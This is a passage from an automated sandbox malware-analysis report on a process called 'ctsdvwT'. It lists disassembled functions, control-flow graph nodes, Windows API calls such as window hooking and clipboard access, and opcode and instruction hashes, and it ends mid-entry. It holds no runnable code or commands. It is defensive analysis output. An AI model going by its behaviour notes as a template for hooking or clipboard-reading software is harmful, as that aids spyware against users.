                                • Instruction ID: d734f1155f9f5d455149450e31f707351bd5d9b652e638fdf0cb5e78fcfbb83b
                                • Opcode Fuzzy Hash: 36d583c1058c80909ceab8f1a7f1bdb2c50a54ac7dd5d1167ad59f178c14da20
                                • Instruction Fuzzy Hash: 4751B0B1D043489FDB14CF9AD884ADEBFB5FF48314F24822AE819AB210D775A845CF94
                                Function 05E18978 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1072 5e18978-5e189de 1073 5e189e0-5e189e6 1072->1073 1074 5e189e9-5e189f0 1072->1074 1073->1074 1075 5e189f2-5e189f8 1074->1075 1076 5e189fb-5e18a9a CreateWindowExW 1074->1076 1075->1076 1078 5e18aa3-5e18adb 1076->1078 1079 5e18a9c-5e18aa2 1076->1079 1083 5e18ae8 1078->1083 1084 5e18add-5e18ae0 1078->1084 1079->1078 1085 5e18ae9 1083->1085 1084->1083 1085->1085
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E18A8A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: de6ebd58f71edce0ce452176fae7a28523cdbd488a732819c66beb866866d104
                                • Instruction ID: 8276618c01faf1d9cd227b9f84e98949ef31513c7fe9236dd98dbc93cee38952
                                • Opcode Fuzzy Hash: de6ebd58f71edce0ce452176fae7a28523cdbd488a732819c66beb866866d104
                                • Instruction Fuzzy Hash: 8B41CEB1D04348DFDB14CF9AD884ADEBBB5BF48314F24822AE819AB210D7759885CF94
                                Function 05E1C28C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1086 5e1c28c-5e1d5a4 1091 5e1d654-5e1d674 call 5e16c24 1086->1091 1092 5e1d5aa-5e1d5af 1086->1092 1099 5e1d677-5e1d684 1091->1099 1094 5e1d5b1-5e1d5e8 1092->1094 1095 5e1d602-5e1d63a CallWindowProcW 1092->1095 1102 5e1d5f1-5e1d600 1094->1102 1103 5e1d5ea-5e1d5f0 1094->1103 1096 5e1d643-5e1d652 1095->1096 1097 5e1d63c-5e1d642 1095->1097 1096->1099 1097->1096 1102->1099 1103->1102
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E1D629
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 05324d0fdf1a5d40f96d99b0653d6e736d89db59330b98c23faa4cf5f9efad8c
                                • Instruction ID: 60227d70825da3ca533d6a10f155fbb2704f27d256e855fd8b39578f458969b6
                                • Opcode Fuzzy Hash: 05324d0fdf1a5d40f96d99b0653d6e736d89db59330b98c23faa4cf5f9efad8c
                                • Instruction Fuzzy Hash: A8415BB4A00349CFDB14CF89C988BAABBF5FF88314F248459D459AB321D775A841CB64
                                Function 05E1E2AC Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1105 5e1e2ac-5e1e2ae 1106 5e1e2b0-5e1e2b3 1105->1106 1107 5e1e2b5-5e1e2b6 1105->1107 1106->1107 1108 5e1e2b8-5e1e2bc 1107->1108 1109 5e1e2bd-5e1e308 1107->1109 1108->1109 1110 5e1e312-5e1e350 OleGetClipboard 1109->1110 1111 5e1e352-5e1e358 1110->1111 1112 5e1e359-5e1e3a7 1110->1112 1111->1112 1117 5e1e3b7 1112->1117 1118 5e1e3a9-5e1e3ad 1112->1118 1120 5e1e3b8 1117->1120 1118->1117 1119 5e1e3af 1118->1119 1119->1117 1120->1120
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: c2f9da6c5afbd0a106c33a7fa9d4eea699586f1b996e45938299e6ca5bf6976c
                                • Instruction ID: 406f0f9428e789b58f5b0f3f84aabd726417c23707cc437e216a2d7f372411b5
                                • Opcode Fuzzy Hash: c2f9da6c5afbd0a106c33a7fa9d4eea699586f1b996e45938299e6ca5bf6976c
                                • Instruction Fuzzy Hash: 4E31E2B0901348DFDB10CF99C985BCEBBF5BB48304F249029E845BB390D7B59845CB65
                                Function 05E1DCA8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1121 5e1dca8-5e1e350 OleGetClipboard 1125 5e1e352-5e1e358 1121->1125 1126 5e1e359-5e1e3a7 1121->1126 1125->1126 1131 5e1e3b7 1126->1131 1132 5e1e3a9-5e1e3ad 1126->1132 1134 5e1e3b8 1131->1134 1132->1131 1133 5e1e3af 1132->1133 1133->1131 1134->1134
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 98b00fb1185ee872295330e7890442aeae7358f94a2bbf69e9cdb24d433a0048
                                • Instruction ID: 9ac745abaf1190a39d70075e605fd20fa1b1bc443ddc94ef2f3cab2362bc1276
                                • Opcode Fuzzy Hash: 98b00fb1185ee872295330e7890442aeae7358f94a2bbf69e9cdb24d433a0048
                                • Instruction Fuzzy Hash: E231E2B0901348DFDB14CF99C945BDEBBF5BB48304F248029E845BB390DBB59845CB95
                                Function 05E1C2BA Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1135 5e1c2ba-5e1c2bb 1136 5e1c2c2-5e1c2d2 1135->1136 1137 5e1c2bd 1135->1137 1139 5e1c2d4-5e1c2d6 1136->1139 1140 5e1c2d9-5e1c2e2 1136->1140 1137->1136 1139->1140 1141 5e1c2e4 1140->1141 1142 5e1c2e9-5e1d8e1 1140->1142 1141->1142 1145 5e1d8e9-5e1d914 KiUserCallbackDispatcher 1142->1145 1146 5e1d916-5e1d91c 1145->1146 1147 5e1d91d-5e1d931 1145->1147 1146->1147
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 8c11b90411bde95b1127be34d19b13abe7af67fdbf1c37ceec493d6b1142f067
                                • Instruction ID: 24cb1a61c73040c76737f4089583ee4e3d809bc3f6fa672a16a63c573153303c
                                • Opcode Fuzzy Hash: 8c11b90411bde95b1127be34d19b13abe7af67fdbf1c37ceec493d6b1142f067
                                • Instruction Fuzzy Hash: C921D0B1808388CFDB11DF99D8847DEBFF4EF0A214F14509AD899EB252D6745804CBE9
                                Function 05E1C6D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1149 5e1c6d0-5e1c76c DuplicateHandle 1150 5e1c775-5e1c792 1149->1150 1151 5e1c76e-5e1c774 1149->1151 1151->1150
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ee833fb9d3de8fb477181401d43aab1c33de3c44c6210ded2015a20827574217
                                • Instruction ID: 4969fa4070a4ef0a37188e604c3a14be8eb0564bb50285c1d510cd9b0fbc3d6e
                                • Opcode Fuzzy Hash: ee833fb9d3de8fb477181401d43aab1c33de3c44c6210ded2015a20827574217
                                • Instruction Fuzzy Hash: 6E21E4B5900348DFDB10CFA9D488AEEBBF5FB48310F24846AE958A3351D374A944CF64
                                Function 05E1C6D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1154 5e1c6d8-5e1c76c DuplicateHandle 1155 5e1c775-5e1c792 1154->1155 1156 5e1c76e-5e1c774 1154->1156 1156->1155
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 322e7aed6a3c613eb9854a55e056a82c92ca44ceeee9c4a9c16aca41812e4c4e
                                • Instruction ID: a35b37c2b6e6b811b6ea3a8208e3c8b2b926b1c770d0dcca432cdda528c1bd8f
                                • Opcode Fuzzy Hash: 322e7aed6a3c613eb9854a55e056a82c92ca44ceeee9c4a9c16aca41812e4c4e
                                • Instruction Fuzzy Hash: 2B21C4B5900348DFDB10CFAAD584ADEBBF4FB48310F14842AE958A7350D375A954CF65
                                Function 05E1FE03 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1159 5e1fe03-5e1fe52 1162 5e1fe54-5e1fe5c 1159->1162 1163 5e1fe5e-5e1fe90 SetWindowsHookExA 1159->1163 1162->1163 1164 5e1fe92-5e1fe98 1163->1164 1165 5e1fe99-5e1feb9 1163->1165 1164->1165
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 05E1FE83
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 3866b9630af1ec5114c8f813076f5ae197e01a6d595d9b3b51f7282ad192f692
                                • Instruction ID: 55bc577bfe257dd517c7e475a38f35b4bf7e466904c261e0ba53ef558b3f64ee
                                • Opcode Fuzzy Hash: 3866b9630af1ec5114c8f813076f5ae197e01a6d595d9b3b51f7282ad192f692
                                • Instruction Fuzzy Hash: 672147B59002099FDB10CF9AC844BEEFBF5FB88320F10842AD459A7250C775A944CFA5
                                Function 05E1FE08 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1169 5e1fe08-5e1fe52 1171 5e1fe54-5e1fe5c 1169->1171 1172 5e1fe5e-5e1fe90 SetWindowsHookExA 1169->1172 1171->1172 1173 5e1fe92-5e1fe98 1172->1173 1174 5e1fe99-5e1feb9 1172->1174 1173->1174
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 05E1FE83
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: d2fdb6d9403362968530ce69c3967204f3835bcc59e2ffaeb012003e569cc98b
                                • Instruction ID: ad280ae034525253c93100f7d3c9b9c9ec6e837ef197c9246e644dca58934851
                                • Opcode Fuzzy Hash: d2fdb6d9403362968530ce69c3967204f3835bcc59e2ffaeb012003e569cc98b
                                • Instruction Fuzzy Hash: AD2138B5D002499FDB14CF9AD844BEEFBF5FB88320F10842AD459A7250C775A944CFA5
                                Function 05E15E3C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1178 5e15e3c-5e17910 1180 5e17912-5e17915 1178->1180 1181 5e17918-5e17943 GetModuleHandleW 1178->1181 1180->1181 1182 5e17945-5e1794b 1181->1182 1183 5e1794c-5e17960 1181->1183 1182->1183
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 05E17936
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 05e67d24134aeac0d22eaa2591e69dbc29648bed3f551d687ae6d9d70bfd930f
                                • Instruction ID: 1497c9eb3fb2b0271ce6887ad8fdbce3a4971d8dfbacbdebe1e94de939c5efb0
                                • Opcode Fuzzy Hash: 05e67d24134aeac0d22eaa2591e69dbc29648bed3f551d687ae6d9d70bfd930f
                                • Instruction Fuzzy Hash: 601120B18006488FDB10CF9AC444BDEFBF4EB48624F10842AD89AB7200C375A549CFA5
                                Function 05E178CA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1185 5e178ca-5e17910 1187 5e17912-5e17915 1185->1187 1188 5e17918-5e17943 GetModuleHandleW 1185->1188 1187->1188 1189 5e17945-5e1794b 1188->1189 1190 5e1794c-5e17960 1188->1190 1189->1190
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 05E17936
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 77a7507dd067adba04ed132ed9bbee63bf9d0f8c154db4c405c06f1e6adb48c0
                                • Instruction ID: f12443c09b5f786596c5b3b82af3b8f580e8010dc89e1be3a52fa559c94ffb89
                                • Opcode Fuzzy Hash: 77a7507dd067adba04ed132ed9bbee63bf9d0f8c154db4c405c06f1e6adb48c0
                                • Instruction Fuzzy Hash: 301102B5C006498FDB10CF9AC844BDEFBF4EB88624F15842AD869B7210C375A549CFA5
                                Function 05E1C2E4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1192 5e1c2e4-5e1d914 KiUserCallbackDispatcher 1197 5e1d916-5e1d91c 1192->1197 1198 5e1d91d-5e1d931 1192->1198 1197->1198
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 6328b0237250a049f42c2c63cf21ba2e3bd6d8c0087e391fe7d17d7fb00b7b54
                                • Instruction ID: 4d0cb74e90ac94f84f95b3416c99dd194386b642cc033cc2ee34667e8efc8b61
                                • Opcode Fuzzy Hash: 6328b0237250a049f42c2c63cf21ba2e3bd6d8c0087e391fe7d17d7fb00b7b54
                                • Instruction Fuzzy Hash: 2B1136B1800348CFDB10DF9AD584BDEBBF4EB48314F20842AD959A7250C3B4A944CFA5
                                Function 05E1DB90 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 05E1E1C5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 87d82b0aa9a69897edfadd4e3a78083087aa323c4b6e04e05be2556dc063ee04
                                • Instruction ID: 8552b52ef7b40285b1aedcd34ef1eab2b76e3975d327e55a7b9f7a5a841f876b
                                • Opcode Fuzzy Hash: 87d82b0aa9a69897edfadd4e3a78083087aa323c4b6e04e05be2556dc063ee04
                                • Instruction Fuzzy Hash: D91148B4900348CFCB10CF9AC449BDEBFF8EB48314F108429E959A7200C375A544CFA5
                                Function 05E1E169 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 05E1E1C5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 57e855735e5db0a7887597ff0865538c2f44733ea9a5d983a1b9d3624c652977
                                • Instruction ID: 8bbc2240ab436a8317b12fe1a77fce46d44f80116cb7f07e0e7eb3e9c70dae2b
                                • Opcode Fuzzy Hash: 57e855735e5db0a7887597ff0865538c2f44733ea9a5d983a1b9d3624c652977
                                • Instruction Fuzzy Hash: 2A1103B59003488FDB10DF9AD449BDEBBF8EB48214F148429E959A7640C375A544CFA5
                                Function 05E1D8A1 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 501ba6b2a021d052687d1ae8f1e5744b1b5ef863979c56dc3653d5d41913df01
                                • Instruction ID: 1489eae11b5f4b1c366a8edc46cbb36f4ea493a816c48959aefcb59ad1613c52
                                • Opcode Fuzzy Hash: 501ba6b2a021d052687d1ae8f1e5744b1b5ef863979c56dc3653d5d41913df01
                                • Instruction Fuzzy Hash: 7D1145B1800348CFCB10DF9AD985BDEFBF4EB48324F20842AD959A7250C7B4A544CFA5
                                Function 00F63E8C Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 36615ed3b50146ed30ffb59e1829a7210ca7ec747edfd8b5f3c42ba3af08aabd
                                • Instruction ID: 64d2368389bdd560c82493b98c7263868f52fa281a33565f778a4dc44e662ae6
                                • Opcode Fuzzy Hash: 36615ed3b50146ed30ffb59e1829a7210ca7ec747edfd8b5f3c42ba3af08aabd
                                • Instruction Fuzzy Hash: B0A1CDB0E00309DFDF15DFA8D8817DEBBF2AF89314F248129E814A7294DB749885DB91
                                Function 00F691D8 Relevance: .4, Instructions: 364COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf438df717da6ab94861711af8ff265f2a1b18f1231989d5466f69b6fca11bd1
                                • Instruction ID: fa0ea2c7854eb0cfb0259880d04075d7cf4f9d4ae754009e31f37c4a0dbceeac
                                • Opcode Fuzzy Hash: cf438df717da6ab94861711af8ff265f2a1b18f1231989d5466f69b6fca11bd1
                                • Instruction Fuzzy Hash: F2D1AE70E042048FDB14DFA9D9907AEBBB5EF89320F14856AE809DB391DBB4DC41DB91
                                Function 00F68E5C Relevance: .4, Instructions: 359COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d66c3e921e52688e66e3c4f8e707ab5e754a75888ab4cd92d0ff4edea003390c
                                • Instruction ID: c09d0e244a11cc93050eaa154882e57a480627ee00e469675a593f2d86089104
                                • Opcode Fuzzy Hash: d66c3e921e52688e66e3c4f8e707ab5e754a75888ab4cd92d0ff4edea003390c
                                • Instruction Fuzzy Hash: 4CD19134F002089FDB14DBA8D594BADBBB6EF89310F208569E806DB350CB75ED42DB51
                                Function 00F67780 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f69f975c73e976c13bfaa11c602294f78c39fdcb5bda2e1326830a207b4f6f0c
                                • Instruction ID: 6075569755a1d2cced5f7edb90832c0435602e78c55fda2195c3c2f85f661eaa
                                • Opcode Fuzzy Hash: f69f975c73e976c13bfaa11c602294f78c39fdcb5bda2e1326830a207b4f6f0c
                                • Instruction Fuzzy Hash: 49B13A707002058FEB15BB68E95122933A6EFD5319BA18A2DE006DF355CF39EC4BA781
                                Function 00F64AA4 Relevance: .3, Instructions: 262COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da17411363088778a5bfced52b09977bf39eb3808d04e84abf2dbcd3fab4a30c
                                • Instruction ID: 822f8cbd359a5c12d5fce6ec470d0a79d2176d595ab41a64c9a61e5c8f7a6592
                                • Opcode Fuzzy Hash: da17411363088778a5bfced52b09977bf39eb3808d04e84abf2dbcd3fab4a30c
                                • Instruction Fuzzy Hash: ECB15D70E00209CFDB10DFA9D8857DEBBF2AF88714F148529D815E7394EB74A885DB91
                                Function 00F66CEA Relevance: .1, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28832bda2dafca7cde63331359b37a1366b6e51461d11356bf0cdf0def931d4b
                                • Instruction ID: a5230d4c3984e02b49746752e483b14f17ed7f5730e70b10e09bcfed52626b32
                                • Opcode Fuzzy Hash: 28832bda2dafca7cde63331359b37a1366b6e51461d11356bf0cdf0def931d4b
                                • Instruction Fuzzy Hash: 725122B4E002588FDB14CFA9C889BEDBBB1BF48314F14812AE815BB395C775A844DF95
                                Function 00F66CF0 Relevance: .1, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99f33ca87b20aa62edea9f0c473f23d99e510989c82ce3c92bc066106b24884a
                                • Instruction ID: 2081ddcd34010772a6131487db310a3d758fdbf2502a0604c8800685c60dd559
                                • Opcode Fuzzy Hash: 99f33ca87b20aa62edea9f0c473f23d99e510989c82ce3c92bc066106b24884a
                                • Instruction Fuzzy Hash: A75124B4E002188FDB14CFA9C888B9DBBF1BF48314F14812AE815BB391D775A844DF95
                                Function 00F6112A Relevance: .1, Instructions: 121COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d6a5dd4d5ffcb1a922f01aef327894e0d454e580d2f64ccf39223f3b2e0d844
                                • Instruction ID: 056133d061fbd032f9bfbafdcbe111f8725c6dea14073b76f71ba4872e1f2b8a
                                • Opcode Fuzzy Hash: 7d6a5dd4d5ffcb1a922f01aef327894e0d454e580d2f64ccf39223f3b2e0d844
                                • Instruction Fuzzy Hash: EC51E9B9206245CFDB16FBE8FD90A993B71FBD2304345DB69D0004B27ADA306947DB81
                                Function 00F6EDFD Relevance: .1, Instructions: 115COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ef15b387676737c880bfc2a521447ebbb1832ce0db1da456c86d71de1095ef8
                                • Instruction ID: 9e5d723d3e097a19cd87632342c9c2c56c55ecab91db376d62546d20f2d1f45b
                                • Opcode Fuzzy Hash: 9ef15b387676737c880bfc2a521447ebbb1832ce0db1da456c86d71de1095ef8
                                • Instruction Fuzzy Hash: B241EE36B002048FDB15AB74D56876E7BA2AF8A710F648468D406DB392EF36CC06E791
                                Function 00F61138 Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 73c9653cff3dcdeca847c90f3d31bf8415368b26c1e0fdc6915ccbf65f40283b
                                • Instruction ID: db619711c73e1385718d2c2f31944a56ed5edf625fd08eb9f4b6705f09405165
                                • Opcode Fuzzy Hash: 73c9653cff3dcdeca847c90f3d31bf8415368b26c1e0fdc6915ccbf65f40283b
                                • Instruction Fuzzy Hash: 1451F8B8206245CFDB16FBE8FD90A993B71F7D2304341DA69D0004B27ADE706947DB81
                                Function 00F6ECC0 Relevance: .1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 950c1746191e7de52a97e93c74c1f2c20457482e600189f34cbc3a708fc3ca17
                                • Instruction ID: 7a13e6bab5bc5ed7a15da80d2da2741c053efa7ee18d650d3cd7b9ddaa47eefe
